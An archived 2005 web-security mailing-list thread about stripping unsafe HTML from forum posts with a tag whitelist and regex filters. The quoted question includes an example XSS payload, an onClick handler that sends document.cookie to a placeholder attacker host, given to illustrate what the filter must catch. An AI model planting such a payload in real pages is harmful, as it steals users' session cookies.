[WEB SECURITY] magic_quotes

dpw dainw at fsr.com
Fri Jun 24 11:18:41 EDT 2005


Pablo, I am working on a system right now for this, and based on excellent
recommendations from the fine people on this list, I have adopted a (mostly)
"whitelist" stance. The code I am writing splits the input at each "<" into
an array, and then evaluates each item. I have an array of "good" HTML tags
that I compare each item against, and if they don't match, I remove them
entirely. If they do match, then I process them through a filter that uses a
few regular expressions I cobbled together to search for things like
"script" or "&#x73&#x63&#x72&#x69&#x70&#x74". I have found a lot of useful
regular expression help at www.regexlib.com, and XSS exploit code to test
with at http://ha.ckers.org/xss.html. 


Good luck,
Dain White
Senior Developer - Webmaster
First Step Internet, L.L.C.
www.fsr.com | www.fsr.net


-----Original Message-----
From: Pablo Fernández [mailto:newsclient at teamq.info] 
Sent: Friday, June 24, 2005 7:29 AM
To: Dave King
Cc: websecurity at webappsec.org
Subject: Re: [WEB SECURITY] magic_quotes


Hi people

Do you happen to know of any library like the PHP Filter one but that is
able to strip *certain* HTML entities, i.e., I have a forum, people can
post using an WYSIWYG, so I want to allow stuff like <b> <i> <u> but I
really don't want to allow <iframe> <script>.

It just pop to my head how does stable boards handle stuff like
onClick=""? I mean, do the manage <a href="#"
onClick="self.location.href='http://cookiestealer.dude/?'+document.cookie;">
and what about <a href="javascript:...."> ???

Ok, if you are aware of something like this, please, drop me a line

Thanks!

Best regards,
Pablo



---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/



More information about the websecurity mailing list